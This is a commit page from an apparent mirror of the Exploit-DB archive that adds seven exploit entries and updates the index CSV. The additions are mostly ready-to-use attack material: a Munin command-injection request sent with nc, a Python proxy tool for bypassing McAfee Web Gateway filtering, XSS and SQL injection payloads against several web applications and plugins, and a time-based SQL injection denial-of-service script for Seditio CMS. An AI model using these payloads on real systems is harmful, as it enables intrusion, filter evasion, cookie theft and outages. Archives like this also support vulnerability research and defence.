bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-05-23

Browse source 
7 new exploits
This commit is contained in:
Offensive Security 2015-05-23 05:01:32 +00:00
parent eb3be45f9b
commit a959c54c79
8 changed files with 262 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -17856,7 +17856,7 @@ id,file,description,date,author,platform,type,port
20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x Firewall Denial of Service Vulnerability",2001-01-08,Nsfocus,sco,dos,0
20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-01-07,scott,cgi,remote,0
20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition DoS Vulnerability",2001-01-10,"Murat - 2",multiple,dos,0
20535,platforms/linux/local/20535.txt,"ReiserFS 3.5.28 Kernel Oops and Code Execution Vulnerability",2001-01-09,"Marc Lehmann",linux,local,0
20535,platforms/linux/local/20535.txt,"ReiserFS 3.5.28 Kernel - DoS & Code Execution Vulnerability",2001-01-09,"Marc Lehmann",linux,local,0
20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0
20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password Vulnerability",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0
20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability",2001-01-11,"Tamer Sahin",php,webapps,0
@ -33464,3 +33464,10 @@ id,file,description,date,author,platform,type,port
37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php Multiple Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 Multiple SQL Injection Vulnerabilities",2015-05-21,"Filippo Roncari",php,webapps,80
37080,platforms/php/webapps/37080.txt,"WordPress WP Symposium Plugin 15.1 SQL Injection Vulnerability",2015-05-21,"Hannes Trunde",php,webapps,80
37081,platforms/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x 'Host' HTTP Header Security Bypass Vulnerability",2012-04-16,"Gabriel Menezes Nunes",multiple,remote,0
37082,platforms/php/webapps/37082.txt,"Bioly 1.3 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2012-04-16,T0xic,php,webapps,0
37083,platforms/php/webapps/37083.txt,"Joomla! Beatz Plugin 1.1 Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Aung Khant",php,webapps,0
37084,platforms/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 Remote Command Injection Vulnerability",2012-04-13,"Helmut Grohne",cgi,webapps,0
37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 'plug.php' SQL Injection Vulnerability",2012-04-15,AkaStep,php,webapps,0
37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0
37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 'login' Field HTML Injection Vulnerability",2012-04-17,"Marcos Garcia",php,webapps,0

Can't render this file because it is too large.

7
platforms/cgi/webapps/37084.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/53032/info
Munin is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application.
printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80

165
platforms/multiple/remote/37081.py Executable file
View file

@ -0,0 +1,165 @@
source: http://www.securityfocus.com/bid/53015/info
McAfee Web Gateway is prone to a security-bypass vulnerability because it fails to properly enforce filtering rules.
A successful attack will allow an attacker to bypass intended security restrictions; this may aid in other attacks.
McAfee Web Gateway 7 is vulnerable; other versions may also be affected.
import socket,struct,sys,time
from threading import Thread
#The timeOut can be changed if the proxy is slow.
#Tested in GMail, Facebook, Youtube and several blocked sites.
#The proxy get the Host field of the http header and do not verify anything else.
#It trusts on the HTTP Header and it can be modified by the attacker.
timeOut = 0.8
isGet = 0
hostNameG = ""
pacoteGet = ""
port = 8080 #Listening port
proxyAddr = "vulnerableProxy.com" #vulnerable proxy
proxyPort = 8080 # proxy port
def handle(client,globalSock):
client.settimeout(timeOut)
global hostNameG
while 1:
dados = ""
tam = 0
while 1:
try:
dados2 = client.recv(1024)
tam = tam + len(dados2)
dados = dados + dados2
except socket.timeout:
break
dd = dados.find("CONNECT") #if the packet is a CONNECT METHOD
if dd != -1:
dd2 = dados.find(":")
hostName = dados[dd+8:dd2]
ipAddr = socket.gethostbyname(hostName) #changing the method to connect to the ip address, not the dns domain
pacote = dados
hostHeader = "Host: " + hostName
pacote = pacote.replace(hostHeader, "Host: www.uol.com.br") #changing the host field with a value that is accepted by the proxy
pacote = pacote.replace(hostName, ipAddr) #changind domain for ip
dados = pacote
getd = dados.find("GET ")
getd2 = dados.find("//")
getd3 = dados.find("/", getd2+2)
hostName = dados[getd2+2:getd3]
if getd != -1:
globalSock.close()
globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
globalSock.connect((proxyAddr,proxyPort))
globalSock.settimeout(timeOut)
getd2 = dados.find("//")
getd3 = dados.find("/", getd2+2)
hostName = dados[getd2+2:getd3]
proxyAuth = ""
proxyAuthN = dados.find("Proxy-Authorization:")
if proxyAuthN != -1:
proxyAuthNN = dados.find("\r\n", proxyAuthN)
proxyAuth = dados[proxyAuthN:proxyAuthNN]
ipAddr = socket.gethostbyname(hostName)
info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n"
if proxyAuthN != -1:
info += proxyAuth + "\r\n"
info += "Host: www.uol.com.br\r\n\r\n"
globalSock.send(info)
tam = 0
gdata = ""
while 1:
try:
gdata2 = globalSock.recv(1024)
tam = tam + len(gdata2)
gdata = gdata + gdata2
if len(gdata2) == 0:
break
except socket.timeout:
break
globalSock.send(dados)
tam = 0
gdata = ""
while 1:
try:
gdata2 = globalSock.recv(1024)
if len(gdata2) > 0:
client.send(gdata2)
tam = tam + len(gdata2)
gdata = gdata + gdata2
if len(gdata2) == 0:
break
except socket.timeout:
break
print 'Proxy Bypass'
print 'by Gabriel Menezes Nunes'
print 'Tested on McAfee Web Gateway 7 and Squid Proxy'
sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Attacked Proxy:',
print proxyAddr
print 'Listening on',
print port
sockzao.bind(("",port))
sockzao.listen(6)
while 1:
print 'Waiting for connections'
client, address = sockzao.accept()
print 'Client Connected'
print address
globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
globalSock.connect((proxyAddr,proxyPort))
globalSock.settimeout(timeOut)
t = Thread(target=handle, args=(client,globalSock,))
t.start()

34
platforms/php/webapps/37082.txt Executable file
View file

@ -0,0 +1,34 @@
source: http://www.securityfocus.com/bid/53018/info
Bioly is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Bioly 1.3 is vulnerable; other versions may also be affected.
Cross Site Scripting
POST /index.php?action=3 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: STORED XSS TEST
Host: localhost
Content-Length: 68
Connection: Close
Pragma: no-cache
# [Post Data:]==>
email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>&register=1
SQL Injection
POST /index.php?action=11 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Sql Injection
Host: localhost
Content-Length: 68
Connection: Close
Pragma: no-cache
# [Post Data:]==>
q=%00'

13
platforms/php/webapps/37083.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/53030/info
Joomla! Beatz Plugin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
http://www.example.com/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
http://www.example.com/beatz/index.php?do=listAll&keyword=++Search";><img+src=0+onerror=prompt(/XSS/)>&option=com_find
http://www.example.com/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search

17
platforms/php/webapps/37085.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/53036/info
Seditio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Seditio CMS 165 is vulnerable; prior versions may also be affected.
$exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='"; //Our exploit.
$first=$targetsite & '/forums.php'; // our 1'st request will go here.
HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection"); //setting user agent 4 fun
InetGet($first,'',1);// first request.After this our IP address will be inserted to table sed_redirecter.It is neccessary to exploit.
Sleep(1500); //sleeping 1.5 second (*Waiting operation*)
HttpSetUserAgent("Exploiting!!!!");//setting our user agent again 4 fun.
InetGet($exploit,'',1,1) ; Now exploiting it with *do not wait* responce option.Until now We exploiting sql injection and causing Denial Of Service.
Exit; //exit from exploit

8
platforms/php/webapps/37086.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/53037/info
Yahoo Answer plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[]/[]/process-imported-question.php?catname=[xss]
http://www.example.com/[]/[]/editautopilot.php?query=[xss]

10
platforms/php/webapps/37087.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/53038/info
TeamPass is prone to an HTML-injection vulnerability because it fails to sanitize user-supplied input.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
TeamPass 2.1.5 is vulnerable; other versions may also be affected.
POST /TeamPass/sources/users.queries.php HTTP/1.1
type=add_new_user&login=[XSS]&pw=testing2&email=test&admin=false&manager=true&read_only=false&personal_folder=false&new_folder_role_domain=false&domain=test&key=key